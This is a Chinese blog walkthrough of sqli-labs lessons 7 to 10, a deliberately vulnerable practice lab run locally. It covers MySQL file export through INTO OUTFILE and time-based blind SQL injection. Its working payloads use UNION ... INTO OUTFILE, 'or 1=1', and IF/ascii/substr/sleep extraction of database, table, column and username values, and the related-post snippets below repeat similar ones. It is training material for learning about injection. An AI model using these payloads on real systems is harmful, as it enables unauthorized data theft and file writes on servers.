sqli-labs-Less-7、8、9、10

最新推荐文章于 2024-06-09 15:52:11 发布
最新推荐文章于 2024-06-09 15:52:11 发布
阅读量1k 收藏 4
点赞数
分类专栏: sqli-lbas 文章标签: sql-labs-less-7/8/9/10
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/86926128
版权

Less-7

注意在要对文件进行导入导出首先得要有足够的权限,

但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null)

secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1、当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出

2、当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下

3、当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制

用以下命令查看secure_file_priv的值

show variables like '%secure%'

在my.ini文件[mysqld]的后面加上secure_file_priv=‘’,然后重启phpstudy即可在这里插入图片描述
1、观察源码发现
在这里插入图片描述
故我们可以使用试’)) or 1=1–+进行注入来注入
在这里插入图片描述
2、进行内容导入
在这里插入图片描述
虽然报错,但是文件已经生产

http://127.0.0.1/sqli-labs-master/Less-7/?id=1'))union select version(),user(),database()into outfile "F:\\php\\PHPTutorial\\WWW\\sqli-labs-master\\Less-7\\3.txt"%23

在这里插入图片描述
注意:
1、outfire 后面的路径为绝对路径且存在
2、要有足够的权限
3、注入的内容也可以是字符串,句子
4、要想注入新内容,需要新的文件名

Less-8

观察源码发现报错注入被注释了,那么我们可以使用延时注入

在这里插入图片描述
在这里插入图片描述
尝试下使用‘or1=1–+注入

http://127.0.0.1/sqli-labs-master/Less-8/?id=1'or 1=1--+

在这里插入图片描述
这里演示下延时注入,如果有错误要等待五秒
http://127.0.0.1/sqli-labs-master/Less-8/?id=1’and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+

在这里插入图片描述
其他注入请参考Less-5这篇博客

Less-9

标题是基于时间-单引号
在这里插入图片描述
所有我们使用’or1=1–+和延时报错进行注入
由于有错误需要延时五秒才行,正确的直接返回结果,所以这边直接给出命令,不贴图
1、猜数据库

http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

说明第一位是s,s的ascii码为115,猜第二位只要把(substr(database(),1,1))=115改成(substr(database(),2,1))=101即可(e的ASCII码为101),
以此类推,得到数据库名字为security

2、猜security的数据表

http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and If(ascii(substr(select table_name from information_schema.tables where table_schema='security'limit 0,1),1,1))=101,1,sleep(5))--+

得到第一个数据库的第一位是e(其ASCII码值为101),猜第二位时只要把table_schema='security’limit 0,1),1,1))=101改成
table_schema='security’limit 0,1),2,1))=109即可,可以猜出第二位为m,以此类推得到emails
猜第二个数据库
table_schema='security’limit 0,1),1,1))=101改成
table_schema='security’limit 1,1),1,1))=114即可,
以此类推得到第二个数据表为referes

3、猜users表的列

http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and If(ascii(substr(select column_name from information_schema.columns where table_name='users'limit 0,1),1,1))=105,1,sleep(5))--+

得到第一列的第一位为i,以此类推可以得到
第一列的第一个字符为id,列名为username,password

4、猜username的值

http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and If(ascii(substr(select username from users limit 0,1),1,1))=68,1,sleep(5))--+

然后大家可以猜出username的所有内容

Less-10

标题为基于时间-双引号在这里插入图片描述
故只需要把less-9里的id=1’改成id=1"即可,其余命令参考less-9;

giunwr
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi-LABS Less-9&&Less-10
m0_64898960的博客
04-17 407
题目如下 由题目得知,其为基于时间的盲注 这里无论输入什么都会是回显出这个页面,是时间盲注没错了... 判断注入点,需要 “ ' ”来闭合1 ?id=1 and if(1,sleep(10),3)--+ ?id=1' and if(1,sleep(10),3)--+ ?id=1" and if(1,sleep(10),3)--+ ... (需要哪个来闭合网页就会缓慢10s) 判断数据库长度 ?id=1' and if(length(database())>5,1,sl.
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1817
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小或文件路径选择-@@version_compile_os四、数据库名-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs(less-9)
不知名白帽的博客
07-14 973
sqli-labs(less-9)。less-9(时间盲注)
sqli-labs-less9
m0_68980215的博客
07-08 189
sql lesson9
sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置
最新发布
Superstacks超全栈
06-09 457
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。只有列号为3的时候,才能正常显示,则段长度为3。进入页面中,并输入数据查看结果。输入单引号会提示语法问题。发现空数据提示语法问题。
Sqli-labs less 9
weixin_34049032的博客
08-11 168
Less-9 本关我们从标题就可以看到 《基于时间-单引号》,所以很明显的这关要我们利用延时注入进行,同时id参数进行的是 ' 的处理。这里我们大致的将延时注入的方法演示一次。 这里用sleep()函数。 这里因为我们利用的是时间的延迟,贴图就没有意义了,这里只payload了:(正确的时候直接返回,不正确的时候等待5秒钟,只贴正确的) 猜测数据库: http://127.0.0.1/...
sqli-labs (less-9)
kukudeshuo的博客
03-08 1404
sqli-labs (less-9) 补充知识 本关将介绍与Boolean盲注非常相似的另一种注入方法——时间盲注。他与Boolean盲注的不同之处在于,时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长。时间盲注多与IF(expr1,expr2,expr3)结合使用,此if语句含义是:如果expr1是TRUE,则IF()的返回值为expr2;否则返回值则为expr3。 例: if (length(database())>1,1,sleep(5)),这句语句的意思是查
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1387
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小或文件路径选择-
Sqli-labs靶场详细攻略Less 6-10
qq_41755084的博客
10-10 880
与第五关相似,只是闭合的单引号换为了双引号。
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 701
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 693
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs Less-9
qq_42630215的博客
03-24 158
Less-9 Get - Blind -Time based -Single Quotes 原页面 基于时间的盲注 如果是正确的直接返回,错误的时候等待5秒钟。 1.猜测数据库: ?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+ ?id=1’ and If(ascii(substr(database(),1,1))=1...
sqli-lab教程Less-9
Brucye
03-23 402
less-9 sqli-lab通过各种方式(整型注入,符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表段拿到段值。 时间盲注 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查段:select co
SQLI-Lab】-Less9
xinyue9966的博客
01-27 241
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)前言一、GET符型注入二、步骤总结 前言 一、GET符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要入、闭合段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payloa
sqli-labs (less9-less10)
Xi4or0uji
07-27 781
less 9 get方法单引号绕过时间盲注 这关是时间盲注,因为无论是对还是错,回显都是you are in,为了区分,我们可以用sleep()函数,错误的时候返回就会延时,方便我们判断 payload是?id=1' and If(mid((select schema_name from information_schema.schemata limit 0,1),2,1)='h',1,sl...
Sqli-labs之Less-9和Less-10
→_→
04-01 713
Less-9 GET - 盲注 - 基于时间 - 单引号 从题目中我们了解到了这是一道关于单引号时间盲注的题,那么我们先尝试 ?id=1' 发现返回的结果竟然是 You are in ... 什么情况?于是分别尝试 ?id=1 ?id=1" 发现结果都是You are in ......
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,被阿里面试官征服了
2401_84103616的博客
04-04 636
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
SQL注入——sqli-labs-Less-9时间盲注_sqliless9,解析底层原理
2401_84433486的博客
04-17 823
测得第一列的名称的第一个符是“i”,同样类推,得到第一列名为“id”,第二列“username”第三列“password”然后,第二个表名的第一位是“r”,依此类推得到第二个表名“referers”,第三个“uagens”,第四个“users”手注是可以注出来,但是相当费时间,我认为,手注更大的意义在于理解方法。(img-qkVA1lLi-1713365620107)]测得第一个表名的第一位是“e”,递推下去得到表名:emails。止,不再深入研究,那么很难做到真正的技术提升。下面尝试注users表。
Blind SQL Injection
Nixawk
04-23 1376
https://www.owasp.org/index.php/Blind_SQL_Injection
MySQL注入实战指南——Sqli-labs教程解析
- **Less-1 至 Less-16** 涉及一系列逐步增加难度的练习,如识别注入点、利用错误信息、基本的SQL命令执行等。 4. **第二部分:Advanced Injection** 进阶部分介绍了更复杂的注入技术,如: - **Background-6** ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值